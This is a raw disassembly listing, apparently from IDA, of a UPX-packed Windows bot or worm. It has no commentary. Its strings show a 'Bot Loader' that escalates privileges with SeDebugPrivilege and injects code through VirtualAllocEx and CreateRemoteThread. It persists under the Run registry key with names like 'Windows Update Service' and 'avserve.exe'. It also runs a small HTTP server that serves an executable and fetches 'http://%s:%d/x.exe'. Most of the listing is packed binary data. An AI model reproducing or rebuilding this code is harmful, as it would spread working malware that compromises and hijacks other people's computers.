dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 10h
aIaimwmlpigzshv db 'iaimwmlpigzshvbp',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 8
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 68h ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h
dd 40D859h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h
dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh
dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh
dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh
dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h
dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h
dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h
dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h
dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h
dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h
dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h
dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h
dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h
dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h
dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h
dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h
dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h
dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h
dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h
dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh
dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah
dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h
dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h
dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h
dd 21DE53C3h, 948E694Eh
dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch
dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h
dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh
dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h
dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h
dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h
dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh
dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh
dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h
dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h
dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h
dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h
dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h
dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh
dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h
dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah
dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h
dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh
dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh
dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh
dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h
dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
